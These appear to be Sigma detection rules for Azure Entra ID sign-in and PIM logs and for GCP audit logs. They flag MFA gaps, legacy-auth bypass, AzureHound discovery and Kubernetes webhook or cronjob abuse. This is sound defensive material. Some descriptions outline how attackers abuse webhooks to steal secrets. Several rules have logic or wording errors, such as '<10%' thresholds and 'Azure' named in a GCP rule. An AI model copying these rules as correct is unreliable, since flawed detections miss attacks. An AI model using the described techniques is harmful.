FILE: rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml
================================================
title: Roles Activation Doesn't Require MFA
id: 94a66f46-5b64-46ce-80b2-75dcbe627cc0
status: test
description: Identifies when a privilege role can be activated without performing mfa.
references:
- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-14
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1078
- attack.persistence
- attack.privilege-escalation
logsource:
product: azure
service: pim
detection:
selection:
riskEventType: 'noMfaOnRoleActivationAlertIncident'
condition: selection
falsepositives:
- Investigate if user is performing MFA at sign-in.
level: high
================================================
FILE: rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml
================================================
title: Roles Are Not Being Used
id: 8c6ec464-4ae4-43ac-936a-291da66ed13d
status: test
description: Identifies when a user has been assigned a privilege role and are not using that role.
references:
- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-14
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1078
- attack.persistence
- attack.privilege-escalation
logsource:
product: azure
service: pim
detection:
selection:
riskEventType: 'redundantAssignmentAlertIncident'
condition: selection
falsepositives:
- Investigate if potential generic account that cannot be removed.
level: high
================================================
FILE: rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml
================================================
title: Too Many Global Admins
id: 7bbc309f-e2b1-4eb1-8369-131a367d67d3
status: test
description: Identifies an event where there are there are too many accounts assigned the Global Administrator role.
references:
- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-14
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1078
- attack.persistence
- attack.privilege-escalation
logsource:
product: azure
service: pim
detection:
selection:
riskEventType: 'tooManyGlobalAdminsAssignedToTenantAlertIncident'
condition: selection
falsepositives:
- Investigate if threshold setting in PIM is too low.
level: high
================================================
FILE: rules/cloud/azure/signin_logs/azure_account_lockout.yml
================================================
title: Account Lockout
id: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a
status: test
description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
author: AlertIQ
date: 2021-10-10
modified: 2022-12-25
tags:
- attack.credential-access
- attack.t1110
logsource:
product: azure
service: signinlogs
detection:
selection:
ResultType: 50053
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml
================================================
title: Increased Failed Authentications Of Any Type
id: e1d02b53-c03c-4948-b11d-4d00cca49d03
status: test
description: Detects when sign-ins increased by 10% or greater.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins
author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'
date: 2022-08-11
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078
logsource:
product: azure
service: signinlogs
detection:
selection:
Status: failure
Count: "<10%"
condition: selection
falsepositives:
- Unlikely
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml
================================================
title: Measurable Increase Of Successful Authentications
id: 67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae
status: test
description: Detects when successful sign-ins increased by 10% or greater.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins
author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton
date: 2022-08-11
modified: 2022-08-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078
logsource:
product: azure
service: signinlogs
detection:
selection:
Status: Success
Count: "<10%"
condition: selection
falsepositives:
- Increase of users in the environment
level: low
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml
================================================
title: Authentications To Important Apps Using Single Factor Authentication
id: f272fb46-25f2-422c-b667-45837994980f
status: test
description: Detect when authentications to important application(s) only required single-factor authentication
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
author: MikeDuddington, '@dudders1'
date: 2022-07-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078
logsource:
product: azure
service: signinlogs
detection:
selection:
Status: 'Success'
AppId: 'Insert Application ID use OR for multiple'
AuthenticationRequirement: 'singleFactorAuthentication'
condition: selection
falsepositives:
- If this was approved by System Administrator.
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml
================================================
title: Successful Authentications From Countries You Do Not Operate Out Of
id: 8c944ecb-6970-4541-8496-be554b8e2846
status: test
description: Detect successful authentications from countries you do not operate out of.
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
author: MikeDuddington, '@dudders1'
date: 2022-07-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.credential-access
- attack.t1078.004
- attack.t1110
logsource:
product: azure
service: signinlogs
detection:
selection:
Status: 'Success'
filter:
Location|contains: ''
condition: selection and not filter
falsepositives:
- If this was approved by System Administrator.
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml
================================================
title: Discovery Using AzureHound
id: 35b781cc-1a08-4a5a-80af-42fd7c315c6b
status: test
description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.
references:
- https://github.com/BloodHoundAD/AzureHound
author: Janantha Marasinghe
date: 2022-11-27
tags:
- attack.discovery
- attack.t1087.004
- attack.t1526
logsource:
product: azure
service: signinlogs
detection:
selection:
userAgent|contains: 'azurehound'
ResultType: 0
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml
================================================
title: Device Registration or Join Without MFA
id: 5afa454e-030c-4ab4-9253-a90aa7fcc581
status: test
description: Monitor and alert for device registration or join events where MFA was not performed.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy
author: Michael Epping, '@mepples21'
date: 2022-06-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078.004
logsource:
product: azure
service: signinlogs
detection:
selection:
ResourceDisplayName: 'Device Registration Service'
conditionalAccessStatus: 'success'
filter_mfa:
AuthenticationRequirement: 'multiFactorAuthentication'
condition: selection and not filter_mfa
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml
================================================
title: Failed Authentications From Countries You Do Not Operate Out Of
id: 28870ae4-6a13-4616-bd1a-235a7fad7458
status: test
description: Detect failed authentications from countries you do not operate out of.
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
author: MikeDuddington, '@dudders1'
date: 2022-07-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.credential-access
- attack.t1078.004
- attack.t1110
logsource:
product: azure
service: signinlogs
detection:
selection:
Status: 'Success'
selection1:
Location|contains: ''
condition: not selection and not selection1
falsepositives:
- If this was approved by System Administrator.
level: low
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml
================================================
title: Azure AD Only Single Factor Authentication Required
id: 28eea407-28d7-4e42-b0be-575d5ba60b2c
status: test
description: Detect when users are authenticating without MFA being required.
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts
author: MikeDuddington, '@dudders1'
date: 2022-07-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.credential-access
- attack.t1078.004
- attack.t1556.006
logsource:
product: azure
service: signinlogs
detection:
selection:
Status: 'Success'
AuthenticationRequirement: 'singleFactorAuthentication'
condition: selection
falsepositives:
- If this was approved by System Administrator.
level: low
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml
================================================
title: Suspicious SignIns From A Non Registered Device
id: 572b12d4-9062-11ed-a1eb-0242ac120002
status: test
description: Detects risky authentication from a non AD registered device without MFA being required.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
author: Harjot Singh, '@cyb3rjy0t'
date: 2023-01-10
modified: 2025-07-02
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078
logsource:
product: azure
service: signinlogs
detection:
selection_main:
Status: 'Success'
AuthenticationRequirement: 'singleFactorAuthentication'
RiskState: 'atRisk'
selection_empty1:
DeviceDetail.trusttype: ''
selection_empty2:
DeviceDetail.trusttype: null
condition: selection_main and 1 of selection_empty*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml
================================================
title: Sign-ins from Non-Compliant Devices
id: 4f77e1d7-3982-4ee0-8489-abf2d6b75284
status: test
description: Monitor and alert for sign-ins where the device was non-compliant.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
author: Michael Epping, '@mepples21'
date: 2022-06-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078.004
logsource:
product: azure
service: signinlogs
detection:
selection:
DeviceDetail.isCompliant: 'false'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml
================================================
title: Sign-ins by Unknown Devices
id: 4d136857-6a1a-432a-82fc-5dd497ee5e7c
status: test
description: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in
author: Michael Epping, '@mepples21'
date: 2022-06-28
modified: 2022-10-05
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078.004
logsource:
product: azure
service: signinlogs
detection:
selection:
AuthenticationRequirement: singleFactorAuthentication
ResultType: 0
NetworkLocationDetails: '[]'
DeviceDetail.deviceId: ''
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml
================================================
title: Potential MFA Bypass Using Legacy Client Authentication
id: 53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc
status: test
description: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
references:
- https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022
- https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/
author: Harjot Singh, '@cyb3rjy0t'
date: 2023-03-20
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.credential-access
- attack.t1078.004
- attack.t1110
logsource:
product: azure
service: signinlogs
detection:
selection:
Status: 'Success'
userAgent|contains:
- 'BAV2ROPC'
- 'CBAinPROD'
- 'CBAinTAR'
condition: selection
falsepositives:
- Known Legacy Accounts
level: high
================================================
FILE: rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml
================================================
title: Application Using Device Code Authentication Flow
id: 248649b7-d64f-46f0-9fb2-a52774166fb5
status: test
description: |
Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.
If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.
This can be a misconfigured application or potentially something malicious.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows
author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
date: 2022-06-01
tags:
- attack.t1078
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: signinlogs
detection:
selection:
properties.message: Device Code
condition: selection
falsepositives:
- Applications that are input constrained will need to use device code flow and are valid authentications.
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml
================================================
title: Applications That Are Using ROPC Authentication Flow
id: 55695bc0-c8cf-461f-a379-2535f563c854
status: test
description: |
Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.
The application then uses those credentials to authenticate the user against the identity provider.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows
author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
date: 2022-06-01
tags:
- attack.t1078
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.initial-access
logsource:
product: azure
service: signinlogs
detection:
selection:
properties.message: ROPC
condition: selection
falsepositives:
- Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml
================================================
title: Account Disabled or Blocked for Sign in Attempts
id: 4afac85c-224a-4dd7-b1af-8da40e1c60bd
status: test
description: Detects when an account is disabled or blocked for sign in but tried to log in
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
author: Yochana Henderson, '@Yochana-H'
date: 2022-06-17
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078.004
logsource:
product: azure
service: signinlogs
detection:
selection:
ResultType: 50057
ResultDescription: Failure
condition: selection
falsepositives:
- Account disabled or blocked in error
- Automation account has been blocked or disabled
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml
================================================
title: Sign-in Failure Due to Conditional Access Requirements Not Met
id: b4a6d707-9430-4f5f-af68-0337f52d5c42
status: test
description: Define a baseline threshold for failed sign-ins due to Conditional Access failures
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
author: Yochana Henderson, '@Yochana-H'
date: 2022-06-01
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.credential-access
- attack.t1110
- attack.t1078.004
logsource:
product: azure
service: signinlogs
detection:
selection:
ResultType: 53003
Resultdescription: Blocked by Conditional Access
condition: selection
falsepositives:
- Service Account misconfigured
- Misconfigured Systems
- Vulnerability Scanners
level: high
================================================
FILE: rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml
================================================
title: Use of Legacy Authentication Protocols
id: 60f6535a-760f-42a9-be3f-c9a0a025906e
status: test
description: Alert on when legacy authentication has been used on an account
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts
author: Yochana Henderson, '@Yochana-H'
date: 2022-06-17
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.credential-access
- attack.t1078.004
- attack.t1110
logsource:
product: azure
service: signinlogs
detection:
selection:
ActivityDetails: Sign-ins
ClientApp:
- Other client
- IMAP
- POP3
- MAPI
- SMTP
- Exchange ActiveSync
- Exchange Web Services
Username: 'UPN'
condition: selection
falsepositives:
- User has been put in acception group so they can use legacy authentication
level: high
================================================
FILE: rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml
================================================
title: Login to Disabled Account
id: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8
status: test
description: Detect failed attempts to sign in to disabled accounts.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
author: AlertIQ
date: 2021-10-10
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078.004
logsource:
product: azure
service: signinlogs
detection:
selection:
ResultType: 50057
ResultDescription: 'User account is disabled. The account has been disabled by an administrator.'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_mfa_denies.yml
================================================
title: Multifactor Authentication Denied
id: e40f4962-b02b-4192-9bfe-245f7ece1f99
status: test
description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.
references:
- https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
author: AlertIQ
date: 2022-03-24
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.credential-access
- attack.t1078.004
- attack.t1110
- attack.t1621
logsource:
product: azure
service: signinlogs
detection:
selection:
AuthenticationRequirement: 'multiFactorAuthentication'
Status|contains: 'MFA Denied'
condition: selection
falsepositives:
- Users actually login but miss-click into the Deny button when MFA prompt.
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml
================================================
title: Multifactor Authentication Interrupted
id: 5496ff55-42ec-4369-81cb-00f417029e25
status: test
description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
author: AlertIQ
date: 2021-10-10
modified: 2022-12-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.credential-access
- attack.t1078.004
- attack.t1110
- attack.t1621
logsource:
product: azure
service: signinlogs
detection:
selection_50074:
ResultType: 50074
ResultDescription|contains: 'Strong Auth required'
selection_500121:
ResultType: 500121
ResultDescription|contains: 'Authentication failed during strong authentication request'
condition: 1 of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml
================================================
title: Azure Unusual Authentication Interruption
id: 8366030e-7216-476b-9927-271d79f13cf3
status: test
description: Detects when there is a interruption in the authentication process.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
author: Austin Songer @austinsonger
date: 2021-11-26
modified: 2022-12-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078
logsource:
product: azure
service: signinlogs
detection:
selection_50097:
ResultType: 50097
ResultDescription: 'Device authentication is required'
selection_50155:
ResultType: 50155
ResultDescription: 'DeviceAuthenticationFailed'
selection_50158:
ResultType: 50158
ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied'
condition: 1 of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml
================================================
title: User Access Blocked by Azure Conditional Access
id: 9a60e676-26ac-44c3-814b-0c2a8b977adf
status: test
description: |
Detect access has been blocked by Conditional Access policies.
The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
author: AlertIQ
date: 2021-10-10
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.credential-access
- attack.initial-access
- attack.t1110
- attack.t1078.004
logsource:
product: azure
service: signinlogs
detection:
selection:
ResultType: 53003
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml
================================================
title: Users Authenticating To Other Azure AD Tenants
id: 5f521e4b-0105-4b72-845b-2198a54487b9
status: test
description: Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
author: MikeDuddington, '@dudders1'
date: 2022-06-30
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078.004
logsource:
product: azure
service: signinlogs
detection:
selection:
Status: 'Success'
HomeTenantId: 'HomeTenantID'
filter:
ResourceTenantId|contains: 'HomeTenantID'
condition: selection and not filter
falsepositives:
- If this was approved by System Administrator.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_access_policy_deleted.yml
================================================
title: GCP Access Policy Deleted
id: 32438676-1dba-4ac7-bf69-b86cba995e05
status: test
description: |
Detects when an access policy that is applied to a GCP cloud resource is deleted.
An adversary would be able to remove access policies to gain access to a GCP cloud resource.
references:
- https://cloud.google.com/access-context-manager/docs/audit-logging
- https://cloud.google.com/logging/docs/audit/understanding-audit-logs
- https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog
author: Bryan Lim
date: 2024-01-12
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1098
logsource:
product: gcp
service: gcp.audit
detection:
selection:
data.protoPayload.authorizationInfo.permission:
- 'accesscontextmanager.accessPolicies.delete'
- 'accesscontextmanager.accessPolicies.accessLevels.delete'
- 'accesscontextmanager.accessPolicies.accessZones.delete'
- 'accesscontextmanager.accessPolicies.authorizedOrgsDescs.delete'
data.protoPayload.authorizationInfo.granted: 'true'
data.protoPayload.serviceName: 'accesscontextmanager.googleapis.com'
condition: selection
falsepositives:
- Legitimate administrative activities
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml
================================================
title: GCP Break-glass Container Workload Deployed
id: 76737c19-66ee-4c07-b65a-a03301d1573d
status: test
description: |
Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.
references:
- https://cloud.google.com/binary-authorization
author: Bryan Lim
date: 2024-01-12
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.t1548
logsource:
product: gcp
service: gcp.audit
detection:
selection:
data.protoPayload.resource.type: 'k8s_cluster'
data.protoPayload.logName:
- 'cloudaudit.googleapis.com/activity'
- 'cloudaudit.googleapis.com%2Factivity'
data.protoPayload.methodName: 'io.k8s.core.v1.pods.create'
keywords:
- 'image-policy.k8s.io/break-glass'
condition: selection and keywords
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_bucket_enumeration.yml
================================================
title: Google Cloud Storage Buckets Enumeration
id: e2feb918-4e77-4608-9697-990a1aaf74c3
status: test
description: Detects when storage bucket is enumerated in Google Cloud.
references:
- https://cloud.google.com/storage/docs/json_api/v1/buckets
author: Austin Songer @austinsonger
date: 2021-08-14
modified: 2022-10-09
tags:
- attack.discovery
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- storage.buckets.list
- storage.buckets.listChannels
condition: selection
falsepositives:
- Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml
================================================
title: Google Cloud Storage Buckets Modified or Deleted
id: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0
status: test
description: Detects when storage bucket is modified or deleted in Google Cloud.
references:
- https://cloud.google.com/storage/docs/json_api/v1/buckets
author: Austin Songer @austinsonger
date: 2021-08-14
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- storage.buckets.delete
- storage.buckets.insert
- storage.buckets.update
- storage.buckets.patch
condition: selection
falsepositives:
- Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml
================================================
title: Google Cloud Re-identifies Sensitive Information
id: 234f9f48-904b-4736-a34c-55d23919e4b7
status: test
description: Identifies when sensitive information is re-identified in google Cloud.
references:
- https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify
author: Austin Songer @austinsonger
date: 2021-08-15
modified: 2022-10-09
tags:
- attack.impact
- attack.t1565
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name: projects.content.reidentify
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml
================================================
title: Google Cloud DNS Zone Modified or Deleted
id: 28268a8f-191f-4c17-85b2-f5aa4fa829c3
status: test
description: Identifies when a DNS Zone is modified or deleted in Google Cloud.
references:
- https://cloud.google.com/dns/docs/reference/v1/managedZones
author: Austin Songer @austinsonger
date: 2021-08-15
modified: 2022-10-09
tags:
- attack.impact
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- Dns.ManagedZones.Delete
- Dns.ManagedZones.Update
- Dns.ManagedZones.Patch
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml
================================================
title: Google Cloud Firewall Modified or Deleted
id: fe513c69-734c-4d4a-8548-ac5f609be82b
status: test
description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).
references:
- https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
- https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html
author: Austin Songer @austinsonger
date: 2021-08-13
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1562
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- v*.Compute.Firewalls.Delete
- v*.Compute.Firewalls.Patch
- v*.Compute.Firewalls.Update
- v*.Compute.Firewalls.Insert
condition: selection
falsepositives:
- Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.
- Exceptions can be added to this rule to filter expected behavior.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml
================================================
title: Google Full Network Traffic Packet Capture
id: 980a7598-1e7f-4962-9372-2d754c930d0e
status: test
description: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.
references:
- https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
- https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html
author: Austin Songer @austinsonger
date: 2021-08-13
modified: 2022-10-09
tags:
- attack.collection
- attack.t1074
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- v*.Compute.PacketMirrorings.Get
- v*.Compute.PacketMirrorings.Delete
- v*.Compute.PacketMirrorings.Insert
- v*.Compute.PacketMirrorings.Patch
- v*.Compute.PacketMirrorings.List
- v*.Compute.PacketMirrorings.aggregatedList
condition: selection
falsepositives:
- Full Network Packet Capture may be done by a system or network administrator.
- If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml
================================================
title: Google Cloud Kubernetes Admission Controller
id: 6ad91e31-53df-4826-bd27-0166171c8040
status: test
description: |
Identifies when an admission controller is executed in GCP Kubernetes.
A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.
The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.
An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.
For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.
An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
references:
- https://cloud.google.com/kubernetes-engine/docs
author: Austin Songer @austinsonger
date: 2021-11-25
modified: 2022-12-18
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.t1078
- attack.credential-access
- attack.t1552
- attack.t1552.007
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name|startswith: 'admissionregistration.k8s.io.v'
gcp.audit.method_name|contains:
- '.mutatingwebhookconfigurations.'
- '.validatingwebhookconfigurations.'
gcp.audit.method_name|endswith:
- 'create'
- 'patch'
- 'replace'
condition: selection
falsepositives:
- Google Cloud Kubernetes Admission Controller may be done by a system administrator.
- If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml
================================================
title: Google Cloud Kubernetes CronJob
id: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435
status: test
description: |
Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.
Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.
An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
references:
- https://cloud.google.com/kubernetes-engine/docs
- https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
- https://kubernetes.io/docs/concepts/workloads/controllers/job/
author: Austin Songer @austinsonger
date: 2021-11-22
modified: 2022-12-25
tags:
- attack.persistence
- attack.privilege-escalation
- attack.execution
logsource:
product: gcp
service: gcp.audit
detection:
selection:
gcp.audit.method_name:
- io.k8s.api.batch.v*.Job
- io.k8s.api.batch.v*.CronJob
condition: selection
falsepositives:
- Google Cloud Kubernetes CronJob/Job may be done by a system administrator.
- If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml
================================================
